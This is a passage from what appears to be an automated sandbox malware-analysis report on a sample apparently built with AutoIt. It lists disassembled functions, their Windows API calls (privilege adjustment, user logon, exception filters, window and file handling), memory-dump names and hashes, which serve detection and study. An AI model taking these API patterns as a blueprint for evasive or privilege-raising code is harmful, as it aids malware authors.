                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 008E81E0
                                                                        • CloseHandle.KERNEL32(?), ref: 008E81F2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 81990902-0
                                                                        • Opcode ID: 7fb65ea2f05e526ac44c23544ee1b1f1f983c8bc21adb3228bb6084dc6652cd4
                                                                        • Instruction ID: 5afaad3d4aed633ce9a3b1707eb37e0c8e6d7490804320a5a6241d36e9c5d061
                                                                        • Opcode Fuzzy Hash: 7fb65ea2f05e526ac44c23544ee1b1f1f983c8bc21adb3228bb6084dc6652cd4
                                                                        • Instruction Fuzzy Hash: 46E0EC72124610EFE7252B65EC09DBB7BEAFF04350714C92DF8AAC4470DB62AC91EB10
                                                                        Function 008BA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,008B8D57,?,?,?,00000001), ref: 008BA15A
                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008BA163
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: e69a8c81b277c7cdefee90358eff484eb97404e8ea8d0f83820258ed024fe4a1
                                                                        • Instruction ID: 41d3e6ce70131e2dffed5841a1092fd3083d7c9578a74451ea229f1643b28978
                                                                        • Opcode Fuzzy Hash: e69a8c81b277c7cdefee90358eff484eb97404e8ea8d0f83820258ed024fe4a1
                                                                        • Instruction Fuzzy Hash: 25B0923126820CEBCA002B91EC19BC83F68FB44BE2F408020F61D84060CB625452EA91
                                                                        Function 0089E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        • Variable must be of type 'Object'., xrefs: 008D3E62
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Variable must be of type 'Object'.
                                                                        • API String ID: 0-109567571
                                                                        • Opcode ID: ef3a096b0c43af245c43ceb09445751a86ba4c870028c830857e8fc050fb920a
                                                                        • Instruction ID: 0220f8b76766e246173f171785f81c8156e716cd2cd50e3578e6e3c52110e5ca
                                                                        • Opcode Fuzzy Hash: ef3a096b0c43af245c43ceb09445751a86ba4c870028c830857e8fc050fb920a
                                                                        • Instruction Fuzzy Hash: DCA27A74A00219CFCF24EF58C480AAEBBB1FB58314F68816AE955EB351D735ED42CB91
                                                                        Function 008BF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b1cb59d5e43b37fc6a799ca62cde2ffd5edf2adf70bbec18a5abedfd53e7d70f
                                                                        • Instruction ID: 91c3a9f56f450b59457b1116c6026263e6b0ff8eb176e631329ce63faf4be316
                                                                        • Opcode Fuzzy Hash: b1cb59d5e43b37fc6a799ca62cde2ffd5edf2adf70bbec18a5abedfd53e7d70f
                                                                        • Instruction Fuzzy Hash: D732DF22D29F414DD7239638DC32336A749EFB73D4F15D737E82AB5AA6EB2884835100
                                                                        Function 008C242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6498c0fa3041a25c63bc324ecd9b98e447e2cc7dd5a860f68549fdd8a890bfb1
                                                                        • Instruction ID: 0504bcfa584ce9684435463cb5f8746e1c13f28eaa0cc2b5a78c74c58b8860d1
                                                                        • Opcode Fuzzy Hash: 6498c0fa3041a25c63bc324ecd9b98e447e2cc7dd5a860f68549fdd8a890bfb1
                                                                        • Instruction Fuzzy Hash: 09B1FF21E3AF414ED323A6398831336BA5CAFBB2D5F52D71BFC2674D62EB2185835141
                                                                        Function 008F8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __time64.LIBCMT ref: 008F889B
                                                                          • Part of subcall function 008B520A: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,008F8F6E,00000000,00000000,?,?,?,008F911F,?,00000000), ref: 008B5213
                                                                          • Part of subcall function 008B520A: __aulldiv.LIBCMT ref: 008B5233
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Time$FileSystem__aulldiv__time64
                                                                        • String ID:
                                                                        • API String ID: 2893107130-0
                                                                        • Opcode ID: b3b0880fd5478207eb23b6722d37318c3e2cd425a12084578c8a437408e9b447
                                                                        • Instruction ID: 75e9d2495e285868afcf5a6777a2c11e9c854408f0ea767abc3931aae1b866df
                                                                        • Opcode Fuzzy Hash: b3b0880fd5478207eb23b6722d37318c3e2cd425a12084578c8a437408e9b447
                                                                        • Instruction Fuzzy Hash: A721AF32639610CBC729CF39D841A62B3E1EBA5311B688E6CE5F5CB2D0CA34A905DB54
                                                                        Function 008F4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008F4C4A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: mouse_event
                                                                        • String ID:
                                                                        • API String ID: 2434400541-0
                                                                        • Opcode ID: 37c6590e3742cb10391c9f0fbe7a562b9ecc6d10baf83c72972e3fa86d1efa21
                                                                        • Instruction ID: 0d6025e887d98bbce90479c67c4b926c9369532cced2fc81aa675e2a13cb51d1
                                                                        • Opcode Fuzzy Hash: 37c6590e3742cb10391c9f0fbe7a562b9ecc6d10baf83c72972e3fa86d1efa21
                                                                        • Instruction Fuzzy Hash: 39D05E9116520D78EC1C07309E1FF7B0108F300796FD0B18B7301CA0D2ECB55C40A031
                                                                        Function 008E87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008E8389), ref: 008E87D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: LogonUser
                                                                        • String ID:
                                                                        • API String ID: 1244722697-0
                                                                        • Opcode ID: 54cb5b5fc12f764bb8425cf7292e7d8fbfe70464cbab52bc8aed4c045b232435
                                                                        • Instruction ID: 76e351ac8cf8f4713520ae9d92b30449c0411e64e3b33ac96c0b59b6f0ffae07
                                                                        • Opcode Fuzzy Hash: 54cb5b5fc12f764bb8425cf7292e7d8fbfe70464cbab52bc8aed4c045b232435
                                                                        • Instruction Fuzzy Hash: 3ED09E3226450EABEF019EA4DD05EEE3B69EB04B01F408511FE15D51A1C775D935EB60
                                                                        Function 008BA124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 008BA12A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: dad3062d69f30de348dfab11119701aef9ae01f844c228c1dd5488147b4c40e3
                                                                        • Instruction ID: 1b60761bd45f6a1bcbe89fa46f4559333d952229b16a910f0df75326ec692aa4
                                                                        • Opcode Fuzzy Hash: dad3062d69f30de348dfab11119701aef9ae01f844c228c1dd5488147b4c40e3
                                                                        • Instruction Fuzzy Hash: 05A0113002820CAB8A002B82EC08888BFACEA003E0B008020F80C80022CB32A822AA80
                                                                        Function 008A8808 Relevance: .6, Instructions: 590COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 987605455c6bb8d1cff7111bd3c4ab7cce2a97f663fe7e96268e134f451df3f4
                                                                        • Instruction ID: 2beb8d65c5d41bee467e3db7b313441422f71fbd0ab19dee59543950918c408d
                                                                        • Opcode Fuzzy Hash: 987605455c6bb8d1cff7111bd3c4ab7cce2a97f663fe7e96268e134f451df3f4
                                                                        • Instruction Fuzzy Hash: 1922483090499ACBEF388A65C49477D77A1FF43308F28806AD946CBD92DB74ED91C762
                                                                        Function 008B21C5 Relevance: .3, Instructions: 345COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                        • Instruction ID: e4ac61f7bc88bf34d30c854ef297e67534f77ff457ae0386b16610d175d22e6e
                                                                        • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                        • Instruction Fuzzy Hash: 92C172322051930ADF6D463984740BEFAA1FEA27B135E076DD8B2CF2D5EE20D965D720
                                                                        Function 008B25FA Relevance: .3, Instructions: 341COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                        • Instruction ID: c087e2ef85278c63500a252ec28a741d701125be4805f42074f146416d07d8d7
                                                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                        • Instruction Fuzzy Hash: 61C183322151930ADF2D463A84341BEBBA1BEA27B135E076DD4B2DF2D5EE20C925D720
                                                                        Function 008B1D90 Relevance: .3, Instructions: 331COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                        • Instruction ID: 80a59271db28ef49389228a51983b0d6eab7f97ee0788f594d4f2cb2a2c9aa15
                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                        • Instruction Fuzzy Hash: CDC184322151930ADF2D463A84780BEBAA1FEA27B135E076DD4B3CF2D5EE10D925D720
                                                                        Function 008B1978 Relevance: .3, Instructions: 323COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                        • Instruction ID: 2fc8abda965921499ddd07409c2e4de8cc39f87cec3737c4d968295a181fe4bc
                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                        • Instruction Fuzzy Hash: A2C1913221519309DF2D463984381BEBBA1FEA27B139E176DD4B2CF2D5EE20D925D720
                                                                        Function 01502018 Relevance: .1, Instructions: 92COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                        • Instruction ID: 47cb0cf78295464f02cfefe31ef6bb19377cd318b43dfd7463e4bcec6f3ecd68
                                                                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                        • Instruction Fuzzy Hash: B541D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                        Function 01501F08 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                        • Instruction ID: 0f75b56633fa9167441d0203c23799a50430b0a00e6ea0af400430ad5bc8f920
                                                                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                        • Instruction Fuzzy Hash: C1018C78A00609EFCB45DF98C5909AEF7B5FB88310F208699E819AB345D730AE41DB91
                                                                        Function 01501EA8 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                        • Instruction ID: 03dc0b85122dc3bd4d5de22ac7fcfcf477f23f0bbc5f32827f94283d296f4623
                                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                        • Instruction Fuzzy Hash: 48018078A00509EFCB45DF98C5909AEF7F5FB88310F208599E819AB345D730EE51DB81
                                                                        Function 01500888 Relevance: .0, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                        Function 00907806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DeleteObject.GDI32(00000000), ref: 0090785B
                                                                        • DeleteObject.GDI32(00000000), ref: 0090786D
                                                                        • DestroyWindow.USER32 ref: 0090787B
                                                                        • GetDesktopWindow.USER32 ref: 00907895
                                                                        • GetWindowRect.USER32(00000000), ref: 0090789C
                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 009079DD
                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 009079ED
                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907A35
                                                                        • GetClientRect.USER32(00000000,?), ref: 00907A41
                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00907A7B
                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907A9D
                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907AB0
                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907ABB
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00907AC4
                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907AD3
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00907ADC
                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907AE3
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00907AEE
                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907B00
                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00922CAC,00000000), ref: 00907B16
                                                                        • GlobalFree.KERNEL32(00000000), ref: 00907B26
                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00907B4C
                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00907B6B
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907B8D
                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00907D7A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
